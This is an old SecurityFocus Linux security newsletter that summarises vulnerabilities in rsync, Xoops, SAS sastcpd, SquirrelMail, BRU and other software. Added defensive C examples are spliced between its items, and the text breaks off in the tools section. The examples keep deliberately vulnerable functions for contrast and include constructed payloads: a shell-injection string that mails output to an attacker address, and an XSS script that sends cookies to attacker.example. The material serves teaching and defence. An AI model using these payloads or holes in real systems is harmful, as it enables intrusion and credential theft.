SecurityFocus Linux Newsletter #66
----------------------------------

This issue is sponsored by SecurityFocus (http://www.securityfocus.com)

**SecurityFocus Promotion: Two Week Trial of SIA**

SecurityFocus(tm), a leading provider of enterprise security threat management systems, announces new pricing for SIA(tm) our Security Intelligence Alert Service. We are also offering a FREE two-week trial of SIA between January 21st and March 15th, 2002.

SIA provides the most comprehensive and customizable vulnerability and malicious code alerts available. SIA delivers complete, up-to-the-minute, specific, actionable information that allows enterprises to prevent attacks before they occur.

SIA allows you to:

**Fully protect your systems with comprehensive alerts that are specific to your infrastructure. SIA allows you to specify down to the version level those products for which you wish to receive alerts.

**Reduce the threat of network downtime from attacks. SIA provides everything you need to know: thorough technical description of the attack, workarounds or available patches, signatures for updating IDSs, mitigation/disinfection strategies, etc.

**Save hours a day by not having to look through hundreds of emails or dozens of websites. SIA allows you to prioritize your current vulnerabilities and eliminate the highest risks first.

To take advantage of our FREE two-week trial offer and receive real-time configuration-specific vulnerability and malicious code alerts, please call toll-free 1-866-577-6300 in the United States and Canada, or +1-650-655-6300 outside North America. You may also contact us at sales@securityfocus.com, or click here http://www.securityfocus.com/feedback to have a sales representative contact you.

-------------------------------------------------------------------------------

I. FRONT AND CENTER
     1. SecurityFocus is Hiring!
     2. Castles Built on Sand: Why Software is Insecure
     3. Understanding IDS Active Response Mechanisms
     4. Reject the Corporate Secrecy Grab
     5. Special Event: Information Security in the Age of Terrorism
II. LINUX VULNERABILITY SUMMARY
     1. rsync Signed Array Index Remote Code Execution Vulnerability
     2. Xoops Remote SQL Injection Vulnerability
     3. Xoops Private Message Box Cross-Site Scripting Vulnerability
     4. AHG Search Engine Search.CGI Arbitrary Command Execution...
     5. Sun Java Virtual Machine Segmentation Violation Vulnerability
     6. Xoops Private Message System Cross-Site Scripting Vulnerability
     7. SAS SASTCPD Command Line Argument Buffer Overflow Vulnerability
     8. SAS SASTCPD Command Format String Vulnerability
     9. PhpSmsSend Remote Shell Command Execution Vulnerability
     10. fwmon Oversized Packet Denial of Service Vulnerability
     11. BRU SetLicense Script Insecure Temporary File Symbolic Link...
     12. SquirrelMail SquirrelSpell Remote Shell Command Execution...
     13. SquirrelMail Malicious HTML Formatted Email Vulnerability
III. LINUX FOCUS LIST SUMMARY
     1. apache and nimbda (Thread)
     2. Mitigating SYN flooding with Netfilter or net.ipv4.tcp_syn...
IV. NEW PRODUCTS FOR LINUX PLATFORMS
     1. BRU Backup and Restore Utility
     2. AntiViral Toolkit Pro (AVP) Z.E.S. Linux
     3. Guardian Digital Linux Lockbox
V. NEW TOOLS FOR LINUX PLATFORMS
     1. SILC (Secure Internet Live Conferencing)(Toolkit) v0.7.3
     2. EnderUNIX spamGuard v1.0
     3. Wolverine Firewall v.99a
     4. Appcap v0.12
VI. SPONSORSHIP INFORMATION

I. FRONT AND CENTER
-------------------
1. SecurityFocus is Hiring!

SecurityFocus is currently looking for a programmer/debugger for its Threat Analysis teams. This position requires skillsets which I have outlined below. These positions require the staff members to be located in Calgary, Alberta, Canada. Relocation assistance is possible from within Canada. Skills will require verification by the way of an actual practical test before an in-person interview is secured.

Skills required:
- Expertise with SoftICE & IDA Pro (or similar tools).
- Expertise with x86 assembly language
- Programming ability in C & C++, targeting both the Unix and Windows platforms
- Strong report writing skills and ability to interface with customers.

Additional skills preferred:
- Working knowledge of computer virus, worm, and trojan propagation techniques
- Working knowledge of honeypots.

Personal Skills Required:
Any applicant must be able to work in a team environment and deal with very tight deliverables. An outgoing pleasant personality is an absolute requirement. No rockstars, no prima donnas.

About SecurityFocus
SecurityFocus is the leading provider of security intelligence products and services for business. They include SIA (Security Intelligence Alert), which alerts subscribers to security vulnerabilities, and ARIS (Attack Registry & Intelligence Service), which predicts cyber assaults on customer networks, based on global attack data. SecurityFocus also licenses the world's largest and most comprehensive vulnerability information database, hosts the most popular security community mailing list on the Internet, Bugtraq, and publishes original security content on its Web site.

Please send resumes if interested to Alfred Huger ah@securityfocus.com

2. Castles Built on Sand: Why Software is Insecure
by Josh Ryder

Software developers spend endless hours developing sophisticated programs that will make users' lives easier and more productive. Unfortunately, the outcome is not always what the developers had in mind. Many software programs are plagued by programming flaws that may lead to security vulnerabilities. This article will offer a brief overview of some of the factors that may contribute to insecure software.
http://www.securityfocus.com/infocus/1541

3. Understanding IDS Active Response Mechanisms
by Jason Larsen and Jed Haile

Debates still rage in the developer community over which methods of detecting attackers are best, but IDS customers as a whole are satisfied with the current IDS technology.
To get an edge on the competition, many of the IDS vendors are adding active response capabilities to their products. The concept underlying this tactic is that the IDS will detect an attacker and then move to stop his attack. The problem is that any attacker with a basic knowledge of TCP/IP can easily defeat these mechanisms directly or simply knock the network offline often enough that the Admin is forced to turn off the feature. It is important for Admins to know the limitations of active response mechanisms to avoid being blindsided by them.
http://www.securityfocus.com/infocus/1540

4. Reject the Corporate Secrecy Grab
By David Banisar

In the name of improving cyber security, corporations are pushing for exemptions to the U.S. Freedom of Information Act (FOIA) that are unnecessary and dangerous. These will result in crucial information being suppressed without improving security.
http://www.securityfocus.com/columnists/56

5. Special Event: Information Security in the Age of Terrorism (March 25-26, 2002, Washington DC)

Join an impressive faculty to learn strategic tools to safeguard your trade secrets and assets at Financial Research Associates' conference on Information Security in the Age of Terrorism, March 25-26 in Washington DC. Learn about the burgeoning relationships between terrorist organizations and hackers, the impact of better funded and organized hackers, how to protect your organization and much more. This event focuses on practical security strategies with practitioner case studies and features an all-star faculty. To see a detailed conference brochure, go to www.frallc.com, or call for more information at 800-280-8440.

II. BUGTRAQ SUMMARY
-------------------
1. rsync Signed Array Index Remote Code Execution Vulnerability
BugTraq ID: 3958
Remote: Yes
Date Published: Jan 25 2002 12:00A
Relevant URL: http://www.securityfocus.com/bid/3958
Summary:
The rsync program is used to synchronize files and directory structures across a network.
It is commonly used to maintain mirrors of ftp sites, often through anonymous access to the rsync server. It is available for Linux and other Unix operating systems. rsync is usually configured to run as the root user.

A vulnerability exists within some versions of rsync. Under some circumstances, a remotely supplied signed value is used as an array index. If a negative value is used as an array index, it is possible to access nearly arbitrary memory locations. It has been reported that this may only be used to write NULL bytes to memory.

If a remote attacker is able to exploit this vulnerability, they may write NULL bytes to arbitrary locations on the stack. This could lead to the corruption of data used to restore an instruction pointer, which in turn would modify the flow of execution of the program. If successfully exploited, this would result in the execution of arbitrary code as the root user.

It is possible that other versions of rsync share this vulnerability.

2. Xoops Remote SQL Injection Vulnerability
BugTraq ID: 3977
Remote: Yes
Date Published: Jan 29 2002 12:00A
Relevant URL: http://www.securityfocus.com/bid/3977
Summary:
Xoops is open-source, freely available web portal software written in object-oriented PHP. It is back-ended by a MySQL database and will run on most Unix and Linux distributions.

A vulnerability exists in the script userinfo.php, included with Xoops. It includes user supplied input in a SQL statement, and fails to correctly escape special characters. As a result, it is possible to modify and subvert the original query. Exploitation of this vulnerability may result in the disclosure of sensitive information.

Additionally, error messages resulting from the SQL statement are passed to the remote user. This may leak additional, valuable information about the structure of the SQL statement.

3.
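The signed-index bug in item 1 (rsync, BID 3958) is easiest to see in a few lines of C. The block below is an added illustration, not rsync's code: the table, its length and the "saved frame data" cell next to it are constructed stand-ins for the real stack layout, and the store of zero mirrors the NULL-byte write the advisory describes. The point is the check itself: a comparison against the upper bound alone lets every negative index through, and one unsigned comparison closes it.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define TABLE_LEN 16
#define SAVED_RET_SENTINEL 0x41414141

/*
 * One flat array so that a negative index still lands inside a single C
 * object (keeps the demonstration well-defined instead of relying on real
 * stack layout). mem[0] stands in for whatever sits just below the table on
 * the real stack: a saved register or the saved return address.
 */
static int32_t mem[1 + TABLE_LEN];
static int32_t *const table = &mem[1];

void reset_frame(void)
{
    memset(mem, 0x7f, sizeof mem);       /* table contents: don't care */
    mem[0] = SAVED_RET_SENTINEL;          /* the value we want to keep intact */
}

int32_t saved_ret(void)
{
    return mem[0];
}

/* Bug pattern: the index is a signed value taken from the peer, and only the
 * upper bound is checked, so -1, -2, ... sail through and the store lands
 * *below* the table. Storing zero is exactly the "write NULL bytes"
 * primitive the advisory describes. */
int store_unchecked(int32_t idx)
{
    if (idx >= TABLE_LEN)
        return -1;                        /* looks like a bounds check, is only half of one */
    table[idx] = 0;
    return 0;
}

/* Fix: compare as unsigned (or test idx < 0 explicitly). Any negative value
 * becomes a huge unsigned number and is rejected by the same comparison. */
int store_checked(int32_t idx)
{
    if ((uint32_t)idx >= (uint32_t)TABLE_LEN)
        return -1;
    table[idx] = 0;
    return 0;
}

int main(void)
{
    reset_frame();
    store_unchecked(-1);                  /* remote-supplied index: -1 */
    printf("unchecked: idx -1 -> saved_ret = 0x%08x (was 0x%08x)\n",
           (unsigned)saved_ret(), (unsigned)SAVED_RET_SENTINEL);

    reset_frame();
    int rc = store_checked(-1);
    printf("checked:   idx -1 -> rc=%d, saved_ret = 0x%08x\n",
           rc, (unsigned)saved_ret());
    return 0;
}
```

With a real stack the cell below the table is whatever the compiler put there; the advisory's "NULL bytes to arbitrary locations" is this store with an attacker-chosen negative offset, and "corruption of data used to restore an instruction pointer" is the case where that offset reaches a saved return address.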
Xoops Private Message Box Cross-Site Scripting Vulnerability
BugTraq ID: 3981
Remote: Yes
Date Published: Jan 29 2002 12:00A
Relevant URL: http://www.securityfocus.com/bid/3981
Summary:
Xoops is open-source, freely available web portal software written in object-oriented PHP. It is back-ended by a MySQL database and will run on most Unix and Linux distributions.

Xoops includes a Private Message System for users, so that they may send messages to one another. The script pmlite.php is used to access this system. This script does not properly escape user supplied data, and is vulnerable to a cross-site scripting attack. Script tags may be submitted as part of the image parameter. When another user views this page, the malicious script code will be executed on that user in the context of the site running Xoops.

This issue may be exploited by an attacker to steal a legitimate user's cookie-based authentication credentials, among other things.

4. AHG Search Engine Search.CGI Arbitrary Command Execution Vulnerability
BugTraq ID: 3985
Remote: Yes
Date Published: Jan 29 2002 12:00A
Relevant URL: http://www.securityfocus.com/bid/3985
Summary:
Search.CGI is a component of the HTMLsearch Search Engine software distributed by AHG. The software is available for the Unix, Linux, and Microsoft platforms.

A problem with the script could make it possible for a remote user to execute arbitrary commands. The problem is in the filtering of input. The search.cgi script included with the AHG Search Engine does not adequately filter input. Due to lack of sufficient input sanitization, it is possible for a remote user to pass semi-colon (;) and pipe (|) characters through a search request. This can result in the commands encapsulated between the symbols being executed with the privileges of the web server.

This problem makes it possible for a remote user to execute arbitrary commands on a vulnerable system. On UNIX systems, this would likely be as an unprivileged user.
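Item 4 (search.cgi), item 9 (PhpSmsSend) and item 12 (SquirrelSpell) are the same bug in three programs: a request parameter is spliced into a command string that is handed to /bin/sh, so ';', '|' and backticks in the parameter become shell syntax. The C below is an added example, not code from any of those projects. It shows the vulnerable shape for contrast and then the fix that removes the shell entirely: fork/exec with an argv array, where the query travels as one argument and metacharacters are just bytes. /bin/echo stands in for the real grep, smssend or ispell binary so that the example runs anywhere.

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Bytes that /bin/sh treats as syntax. Rejecting them is a useful extra
 * check, not a substitute for keeping the shell out of the path entirely. */
int has_shell_metachars(const char *s)
{
    return strpbrk(s, ";|&`$<>()\\\"'\n*?[]{}~") != NULL;
}

/* Vulnerable shape (the search.cgi / PhpSmsSend pattern): the query is
 * spliced into a command line and the shell parses the result, so a query of
 * "foo; id" runs id. Shown for contrast only; never called in this example. */
int search_with_shell(const char *query)
{
    char cmd[512];
    snprintf(cmd, sizeof cmd, "/usr/bin/grep -i %s index.txt", query);
    return system(cmd);
}

/* Fix: fork/exec with an argv array. No shell is involved, so each element
 * reaches the program as exactly one argument, bytes intact. Child stdout is
 * captured into out; returns the child's exit status, or -1 on failure. */
int run_capture(const char *path, char *const argv[], char *out, size_t outlen)
{
    int fd[2];
    if (pipe(fd) != 0)
        return -1;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        dup2(fd[1], STDOUT_FILENO);
        close(fd[0]);
        close(fd[1]);
        execv(path, argv);
        _exit(127);                       /* exec failed */
    }
    close(fd[1]);
    size_t used = 0;
    ssize_t n;
    while (used + 1 < outlen &&
           (n = read(fd[0], out + used, outlen - used - 1)) > 0)
        used += (size_t)n;
    out[used] = '\0';
    close(fd[0]);
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* What a hardened search.cgi does with the request. Note that argv passing
 * stops shell injection but not option injection: a query beginning with '-'
 * may still be read as a flag by the target, so validate the first byte or
 * pass "--" where the target program honours it (echo does not). */
int search_safely(const char *query, char *out, size_t outlen)
{
    char *argv[] = { "echo", (char *)query, NULL };   /* /bin/echo stands in for grep */
    return run_capture("/bin/echo", argv, out, outlen);
}

int main(void)
{
    /* constructed hostile input, of the kind the three advisories describe */
    const char *query = "linux; id | mail attacker@example.com";
    char out[256];
    printf("metachars present: %d\n", has_shell_metachars(query));
    int rc = search_safely(query, out, sizeof out);
    printf("exit %d, the program received the literal argument: %s", rc, out);
    return 0;
}
```

Run it and the child prints the whole query, semicolon and pipe included, because nothing between the CGI and the program ever parsed it as a command line. That is the property to check for in any wrapper that calls an external binary, whether it is written in Perl, PHP or C.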
On Microsoft systems, these commands may be executed with SYSTEM privileges.

5. Sun Java Virtual Machine Segmentation Violation Vulnerability
BugTraq ID: 3992
Remote: No
Date Published: Jan 30 2002 12:00A
Relevant URL: http://www.securityfocus.com/bid/3992
Summary:
Java programs run in an interpreted environment, the Java Virtual Machine (JVM). Sun has provided a reference JVM implementation for multiple platforms, including Solaris, Windows and Linux.

A possible vulnerability exists in the Sun JVM. It is possible for a maliciously constructed java program to cause a segmentation fault, crashing the virtual machine. This should not be possible with valid java bytecode.

In a shared environment, a malicious user able to contribute and execute compiled java code may be able to exploit this vulnerability to create a denial of service attack. For example, user contributed code may be executed within the context of a java based web server shared across multiple domains, or shared code used by a JINI system.

The ability to deterministically crash the JVM has been demonstrated on the Linux implementation of the Sun JVM. Other implementations may share this vulnerability.

6. Xoops Private Message System Cross-Site Scripting Vulnerability
BugTraq ID: 3978
Remote: Yes
Date Published: Jan 29 2002 12:00A
Relevant URL: http://www.securityfocus.com/bid/3978
Summary:
Xoops is open-source, freely available web portal software written in object-oriented PHP. It is back-ended by a MySQL database and will run on most Unix and Linux distributions.

Xoops includes a Private Message System for users, so that they may send messages to one another. The Title: field of the Private Message System does not sufficiently filter HTML tags. This makes it possible for an attacker to supply malicious input for the Title: field which contains arbitrary script code.
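Items 3 and 6 above (and item 13 below) come down to the same omission: user-controlled text is copied into a page without being escaped, once as element text (the Title: field) and once inside an attribute (the image parameter). The added example below is not Xoops code and is in C rather than PHP; it does what PHP's htmlspecialchars() with ENT_QUOTES does, and renders a message title and an image URL both unescaped and escaped so the difference is visible. The payloads are constructed for the demonstration.

```c
#include <stdio.h>
#include <string.h>

/* Escape the five characters that let data break out of HTML text or out of
 * a quoted attribute value. Writes a NUL-terminated string to out; returns
 * the number of bytes written (not counting the NUL), or -1 if out is too
 * small. Escaping '"' and '\'' is what makes the result safe inside
 * attributes as well as between tags. */
int html_escape(const char *in, char *out, size_t outlen)
{
    size_t used = 0;
    for (; *in; in++) {
        const char *rep = NULL;
        switch (*in) {
        case '&':  rep = "&amp;";  break;
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        }
        size_t n = rep ? strlen(rep) : 1;
        if (used + n >= outlen)           /* leave room for the NUL */
            return -1;
        if (rep)
            memcpy(out + used, rep, n);
        else
            out[used] = *in;
        used += n;
    }
    out[used] = '\0';
    return (int)used;
}

/* The pmlite.php-style bug: the Title: field goes straight into the markup. */
int render_title_unsafe(const char *title, char *out, size_t outlen)
{
    return snprintf(out, outlen, "<b>%s</b>", title);
}

/* Hardened: escape first, then place the result in element text. */
int render_title_safe(const char *title, char *out, size_t outlen)
{
    char esc[1024];
    if (html_escape(title, esc, sizeof esc) < 0)
        return -1;
    return snprintf(out, outlen, "<b>%s</b>", esc);
}

/* The image parameter case: the value sits inside a double-quoted attribute,
 * so a stray '"' would end the attribute and start a new one (onerror=...). */
int render_image_safe(const char *url, char *out, size_t outlen)
{
    char esc[1024];
    if (html_escape(url, esc, sizeof esc) < 0)
        return -1;
    return snprintf(out, outlen, "<img src=\"%s\">", esc);
}

int main(void)
{
    /* constructed payloads, not taken from the advisories */
    const char *title = "<script>document.location='http://attacker.example/?'+document.cookie</script>";
    const char *image = "x\" onerror=\"alert(document.cookie)";
    char out[2048];
    render_title_unsafe(title, out, sizeof out);
    printf("unsafe: %s\n", out);
    render_title_safe(title, out, sizeof out);
    printf("safe:   %s\n", out);
    render_image_safe(image, out, sizeof out);
    printf("image:  %s\n", out);
    return 0;
}
```

The escaped title is displayed as the literal text the attacker typed; the escaped image value stays a single attribute, because the embedded quote became &quot;. Escaping is context-specific: this routine covers element text and quoted attributes, and would not by itself make a value safe inside a script block or a URL scheme.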
When another user receives the attacker's private message, the malicious script code will be executed on that user in the context of the site running Xoops.

This issue may be exploited by an attacker to steal a legitimate user's cookie-based authentication credentials, among other things.

7. SAS SASTCPD Command Line Argument Buffer Overflow Vulnerability
BugTraq ID: 3979
Remote: No
Date Published: Jan 29 2002 12:00A
Relevant URL: http://www.securityfocus.com/bid/3979
Summary:
sastcpd is a "Job Spawner" included with the base installation of the SAS Software infrastructure. It is available for various platforms. This issue affects systems running the Unix, Linux, and Microsoft operating systems.

A problem with the software could make it possible for a local user to gain elevated privileges. The problem is in the handling of long command line arguments.

A problem has been discovered in the sastcpd program. sastcpd is a job spawning program included with the SAS Base product. By default, it is installed setuid root. When sastcpd is executed with a command line argument of 1200 characters, a buffer overflow occurs. This overflow can result in the overwriting of stack variables, including the return address, and the execution of arbitrary code. As the sastcpd program is installed setuid root, the code will be executed with administrative privileges.

This problem makes it possible for a local user to gain administrative access.

8. SAS SASTCPD Command Format String Vulnerability
BugTraq ID: 3980
Remote: No
Date Published: Jan 29 2002 12:00A
Relevant URL: http://www.securityfocus.com/bid/3980
Summary:
sastcpd is a "Job Spawner" included with the base installation of the SAS Software infrastructure. It is available for various platforms. This issue affects systems running the Unix, Linux, and Microsoft operating systems.

A problem with the software could make it possible for a local user to gain elevated privileges. The problem is in the handling of format strings.
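Items 7 and 8 are the two classic ways a setuid program mishandles a command-line argument: copying it into a fixed buffer without a length check, and passing it to a printf-family function as the format. The C below is an added example, not sastcpd's code (SAS's sources are not public and the real buffer size is not given; 256 bytes is an assumed size). Each pattern is shown beside its fix, with a deterministic demonstration of the format-string case: the same hostile argument is printed once as a format and once as data.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define ARG_BUF 256   /* assumed size; sastcpd's real buffer size is not given in the advisory */

/* Bug 1 (BID 3979): fixed-size stack buffer, unbounded copy. A 1200-byte
 * argument runs past buf and over the saved registers and return address.
 * Shown for contrast; this example never calls it with oversized input. */
int copy_arg_unchecked(const char *arg)
{
    char buf[ARG_BUF];
    strcpy(buf, arg);
    return (int)strlen(buf);
}

/* Fix: measure first and refuse anything that does not fit, rather than
 * truncating silently (silent truncation can become a bug of its own). */
int copy_arg_checked(char *dst, size_t dstlen, const char *arg)
{
    size_t n = strlen(arg);
    if (n >= dstlen)
        return -1;
    memcpy(dst, arg, n + 1);
    return (int)n;
}

/* Bug 2 (BID 3980): the argument *is* the format string. "%x" walks up the
 * stack, "%n" writes an integer through a pointer found there. The spare 0
 * argument exists only so this compiles without a format-security warning;
 * it does not make the call safe. */
int log_arg_unchecked(char *out, size_t outlen, const char *arg)
{
    return snprintf(out, outlen, arg, 0);
}

/* Fix: the format is a literal; the argument can only ever be data. */
int log_arg_checked(char *out, size_t outlen, const char *arg)
{
    return snprintf(out, outlen, "%s", arg);
}

/* Builds an argument of len 'A's (like the 1200-byte one in the advisory)
 * and feeds it to the checked copy. Returns that call's result. */
int try_long_arg(size_t len)
{
    char dst[ARG_BUF];
    char *arg = malloc(len + 1);
    if (!arg)
        return -1;
    memset(arg, 'A', len);
    arg[len] = '\0';
    int rc = copy_arg_checked(dst, sizeof dst, arg);
    free(arg);
    return rc;
}

int main(void)
{
    char out[64];
    const char *hostile = "pid=%d done 50%%";   /* constructed: two format directives */
    printf("1200-byte argument accepted? rc=%d\n", try_long_arg(1200));
    log_arg_unchecked(out, sizeof out, hostile);
    printf("as format: %s\n", out);   /* directives consumed: pid=0 done 50% */
    log_arg_checked(out, sizeof out, hostile);
    printf("as data:   %s\n", out);   /* unchanged: pid=%d done 50%% */
    return 0;
}
```

The "as format" line is the tell: the program interpreted the argument, consuming one directive and collapsing the other. Replace %d with %n and the same interpretation becomes a write to memory, which is the route from BID 3980 to root; the checked copy makes the 1200-byte argument of BID 3979 a refused request instead of a smashed stack.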
A problem has been discovered in the sastcpd program. sastcpd is a job spawning program included with the SAS Base product. By default, it is installed setuid root. sastcpd is vulnerable to a format string attack. When executed with a command line argument of a format string, it is possible to overwrite arbitrary addresses in memory. This can result in the execution of arbitrary code. As the sastcpd program is installed setuid root, the code will be executed with administrative privileges.

This problem makes it possible for a local user to gain administrative access.

9. PhpSmsSend Remote Shell Command Execution Vulnerability
BugTraq ID: 3982
Remote: Yes
Date Published: Jan 29 2002 12:00A
Relevant URL: http://www.securityfocus.com/bid/3982
Summary:
PhpSmsSend is a front end to the SmsSend program, and allows users to send SMS messages through a web interface. SmsSend is available for Linux and Microsoft Windows.

PhpSmsSend accepts a message to send as a user supplied CGI parameter. This data is then used to build a command calling SmsSend. PhpSmsSend does not properly validate user input used in this manner. A malicious party may include escape characters such as ` in the input, and execute additional, arbitrary shell commands.

Exploitation of this vulnerability could lead to arbitrary code being executed as the script user, generally 'nobody'. This could lead to local access to the vulnerable system, from which point further elevated privileges may be easier to obtain.

10. fwmon Oversized Packet Denial of Service Vulnerability
BugTraq ID: 3984
Remote: Yes
Date Published: Jan 25 2002 12:00A
Relevant URL: http://www.securityfocus.com/bid/3984
Summary:
fwmon is a firewall monitoring tool. It works with the Linux operating system, and either iptables or ipchains. It is able to provide more detailed information on network traffic than the standard ipchains log.

It is possible for some versions of fwmon to crash when the kernel sends an oversized packet.
If an attacker were able to exploit this condition, it may be possible to create a denial of service condition. If firewall monitoring is disrupted, further attacks against the host would go undetected. This would not impact the effectiveness of the firewall, only the quality of the log data.

11. BRU SetLicense Script Insecure Temporary File Symbolic Link Vulnerability
BugTraq ID: 3970
Remote: No
Date Published: Jan 26 2002 12:00A
Relevant URL: http://www.securityfocus.com/bid/3970
Summary:
BRU is a commercially available backup software infrastructure available for both UNIX and Linux Operating Systems. It is distributed and maintained by the Tolis Group.

A problem with the software could make it possible for a local user to overwrite system files. This problem is in the creation of temporary files. When BRU executes, it creates temporary files insecurely. When the setlicense script is executed, a couple of problems occur that could lead to the overwriting of system files. This is due first to the fact that setlicense uses an easily predicted filename for the storage of data in the temporary directory. Upon execution, setlicense stores data in the file /tmp/brutest.$$, where $$ signifies the process id of the current shell. Secondarily, the setlicense script does not perform adequate checks on the temporary file prior to attempting to create and write to it. The setlicense script neglects to check for the existence of the file it is attempting to write to, and thus can be tricked into overwriting root owned files through symbolic links.

This makes it possible for a local user to overwrite arbitrary root owned files, and could potentially lead to denial of service, or local elevated privileges.

12.
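Item 11 is the standard /tmp race: a predictable name (/tmp/brutest.$$, where the attacker only has to guess a process id) plus an open that creates-or-truncates whatever is already at that name. The C below is an added example, not BRU's setlicense (which is a shell script); it stages the attacker's symlink inside a throwaway directory, then opens the predictable path the way the script does and the way a hardened program should. The directory, the "victim" file and the guessed pid are constructed for the demonstration; on a real system the victim is a root-owned file and the script runs as root.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* The setlicense pattern: open a predictable name for writing, creating or
 * truncating whatever it resolves to. If an attacker planted a symlink
 * there first, the root-owned target is what gets truncated. */
int open_tmp_unsafe(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
}

/* Hardened: O_EXCL refuses to create if anything (a symlink included) already
 * exists at the name, and O_NOFOLLOW refuses to follow a symlink at the last
 * component. On failure errno is EEXIST or ELOOP. */
int open_tmp_safe(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Better still: let libc pick an unpredictable name and create it atomically
 * with the same O_EXCL semantics (mktemp(1) does this for shell scripts). */
int open_tmp_mkstemp(char *template_inout)
{
    return mkstemp(template_inout);
}

static long file_size(const char *path)
{
    struct stat st;
    return stat(path, &st) == 0 ? (long)st.st_size : -1;
}

/* Stages the attack and tries both opens. Returns a bitmask:
 *   bit 0: the unsafe open truncated the victim through the symlink
 *   bit 1: the safe open refused (EEXIST/ELOOP) and the victim is intact
 * 3 means both outcomes were observed. A private directory is used so that
 * fs.protected_symlinks (which only governs sticky world-writable dirs) does
 * not change the outcome. */
int demo_symlink_attack(void)
{
    char dir[] = "/tmp/bru-demo-XXXXXX";
    if (mkdtemp(dir) == NULL)
        return -1;
    char victim[512], link[512];
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(link, sizeof link, "%s/brutest.1234", dir);   /* "$$" guessed as 1234 */

    FILE *f = fopen(victim, "w");                          /* the "root-owned" target */
    if (!f)
        return -1;
    fputs("important data\n", f);
    fclose(f);

    if (symlink(victim, link) != 0)                        /* the attacker's move */
        return -1;

    int result = 0;
    int fd = open_tmp_unsafe(link);
    if (fd >= 0) {
        close(fd);
        if (file_size(victim) == 0)
            result |= 1;
    }

    f = fopen(victim, "w");                                /* restore, then retry hardened */
    if (f) { fputs("important data\n", f); fclose(f); }
    fd = open_tmp_safe(link);
    if (fd < 0 && (errno == EEXIST || errno == ELOOP) && file_size(victim) > 0)
        result |= 2;
    if (fd >= 0)
        close(fd);

    unlink(link);
    unlink(victim);
    rmdir(dir);
    return result;
}

int main(void)
{
    printf("outcome bitmask: %d (3 = unsafe open clobbered the target, safe open refused)\n",
           demo_symlink_attack());
    return 0;
}
```

The check for existence the advisory says setlicense lacks is not enough on its own either: a test-then-open leaves a window in which the symlink can be planted. The fix is to make creation itself atomic, which is what O_CREAT|O_EXCL, mkstemp(3) and mktemp(1) do.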
SquirrelMail SquirrelSpell Remote Shell Command Execution Vulnerability
BugTraq ID: 3952
Remote: Yes
Date Published: Jan 24 2002 12:00A
Relevant URL: http://www.securityfocus.com/bid/3952
Summary:
SquirrelMail is a feature rich webmail program implemented in the PHP4 language. It is available for Linux and Unix based operating systems. SquirrelMail allows for extended functionality through a plugin system. One of the plugins included with SquirrelMail is SquirrelSpell, a spellchecker script.

A vulnerability exists if a remote user is able to directly access the spellchecker PHP script. Global variables used to construct a shell command are not initialized within this script. If they are supplied as CGI parameters, they may be defined with user supplied input. As a result, a remote user can call this script with additional shell commands included in these variables. The shell commands will then be executed as the web server, generally as the user nobody. From this point, it may be possible to gain local access to the machine as the non-privileged user 'nobody'.

Earlier versions of SquirrelSpell may share this vulnerability.

13. SquirrelMail Malicious HTML Formatted Email Vulnerability
BugTraq ID: 3956
Remote: Yes
Date Published: Jan 24 2002 12:00A
Relevant URL: http://www.securityfocus.com/bid/3956
Summary:
SquirrelMail is a feature rich webmail program implemented in the PHP4 language. It is available for Linux and Unix based operating systems.

A vulnerability exists in some versions of SquirrelMail. If a user chooses to view HTML formatted email, some malicious HTML tags may be included. These tags may include JavaScript, which could lead to some form of a cross site scripting attack. Additionally, an external reference may be constructed with a relative link to another SquirrelMail script.
If CGI parameters are included in this link, and user authentication is being handled through an automated mechanism such as cookies, it may be possible to take actions as the user on the SquirrelMail system. It has been reported that it is possible to access the compose.php script in this manner, and send new email as the vulnerable user.

III. LINUX FOCUS LIST SUMMARY
---------------------------------
1. apache and nimbda (Thread)
Relevant URL: http://www.securityfocus.com/cgi-bin/archive.pl?id=91&mid=20020130220245.L26840@jensbenecke.de&threads=1

2. Mitigating SYN flooding with Netfilter or net.ipv4.tcp_syncookies ? (Thread)
Relevant URL: http://www.securityfocus.com/cgi-bin/archive.pl?id=91&mid=13CFD9ED17AAD411982B00D0B76DFB8A013705A9@WHEAT&threads=1

IV. NEW PRODUCTS FOR LINUX PLATFORMS
----------------------------------------
1. BRU Backup and Restore Utility
by Enhanced Software Technologies
Platforms: Solaris
Relevant URL: http://www.bru.com/
Summary:
BRU has been providing Backup You Can Trust[SM] to the Unix community since 1985 and for Linux since 1994. This software provides a backup solution to UNIX/Linux on multiple platforms and architectures.

2. AntiViral Toolkit Pro (AVP) Z.E.S. Linux
by Kaspersky Labs
Platforms: Linux
Relevant URL: http://www.kasperskylabs.com/
Summary:
AntiViral Toolkit Pro (AVP) Z.E.S. Linux is a distribution package containing a Linux-based bootable rescue diskette with pre-installed anti-virus software, AVP for Linux. It is a unique tool, which allows fast and efficient restoration of the boot ability of a computer affected by a virus attack. It also makes it possible to actively neutralise computer viruses invisible to many anti-virus products on infected systems.

3. Guardian Digital Linux Lockbox
by Guardian Digital, Inc.
Platforms: Linux
Relevant URL: http://www.guardiandigital.com/lockbox.html
Summary:
The Guardian Digital Linux Lockbox is the first open source network server appliance designed to serve as a complete e-business solution. Powering the Lockbox is EnGarde, Guardian Digital's Linux, engineered to achieve the level of security required to conduct e-business.

V. NEW TOOLS FOR LINUX PLATFORMS
--------------------------------
1. SILC (Secure Internet Live Conferencing)(Toolkit) v0.7.3
by Priikone
Relevant URL: http://silcnet.org/
Platforms: Linux, UNIX
Summary:
